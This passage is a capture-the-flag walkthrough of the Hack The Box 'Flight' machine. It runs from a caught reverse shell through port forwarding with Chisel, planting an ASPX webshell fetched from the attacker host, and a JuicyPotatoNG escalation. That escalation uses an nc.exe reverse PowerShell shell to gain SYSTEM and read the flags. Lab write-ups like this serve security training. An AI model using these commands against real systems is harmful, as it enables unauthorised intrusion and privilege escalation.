listening on [any] 8443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50150
PS C:\Windows\system32> whoami
flight\c.bum
Get the user flag
PS C:\Users\C.Bum> type Desktop\user.txt
ed94451f15400f9a656xxxxxxxxxxxxxxxx
User Flag: ed94451f15400f9axxxxxxxxxxxxx
Looking at the listening ports, a non-default one (8000) is there.
PS C:\Users\C.Bum> netstat -ano | findstr TCP
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5636
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5636
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
Confirm webapp existence
PS C:\Users\C.Bum> curl http://127.0.0.1:8000 -UseBasicParsing
StatusCode : 200
StatusDescription : OK
Content : <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
I will then forward this port to my Kali machine with Chisel.
┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
2024/07/20 02:22:44 server: Reverse tunnelling enabled
2024/07/20 02:22:44 server: Fingerprint zWfxqSWqKl2N1LrFVrpM+V7q9qqtfuYJ5NCiPneI7eM=
2024/07/20 02:22:44 server: Listening on http://0.0.0.0:9001
PS C:\users\Public> .\chisel.exe client 10.10.16.7:9001 R:8888:127.0.0.1:8000
.\chisel.exe client 10.10.16.7:9001 R:8888:localhost:8000
2024/07/20 06:23:04 client: Connecting to ws://10.10.16.7:9001
2024/07/20 06:23:05 client: Connected (Latency 64.1406ms)
The Windows client connected:
┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
<snip>
2024/07/20 02:43:21 server: session#1: tun: proxy#R:8888=>8000: Listening
There is a webapp running on IIS 10.0
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nmap -p8888 localhost -sCV
PORT STATE SERVICE VERSION
8888/tcp open http Microsoft IIS httpd 10.0
|_http-title: Flight - Travel and Tour
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
http://localhost:8888/

Shell as defaultapppool
PS C:\inetpub> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:24 PM custerr
d----- 7/20/2024 6:57 AM development
d----- 9/22/2022 1:08 PM history
d----- 9/22/2022 12:32 PM logs
d----- 9/22/2022 12:24 PM temp
d----- 9/22/2022 12:28 PM wwwroot
There is a development folder, and C.BUM has full access to it
PS C:\inetpub> icacls development
development flight\C.Bum:(OI)(CI)(W)
<snip>
So, I can write a webshell to that folder.
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
I downloaded the shell to my kali and then uploaded it to the windows box
PS C:\inetpub\development> curl 10.10.16.7/cmd.aspx -o .\cmd.aspx
http://localhost:8888/cmd.aspx

Get a Shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
Shell as Administrator
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
<snip>
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Since I have SeImpersonatePrivilege, I can escalate to SYSTEM using JuicyPotatoNG
PS C:\Users\Public> .\JuicyPotatoNG.exe -t * -p "C:\Users\Public\nc.exe" -a "10.10.16.7 5555 -e PowerShell"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50363
PS C:\> whoami
nt authority\system
PS C:\> type C:\Users\Administrator\Desktop\root.txt
a884480417f1f666bf6xxxxxxxxxxxxxx
Root Flag: a884480417f1f666xxxxxxxxxxxx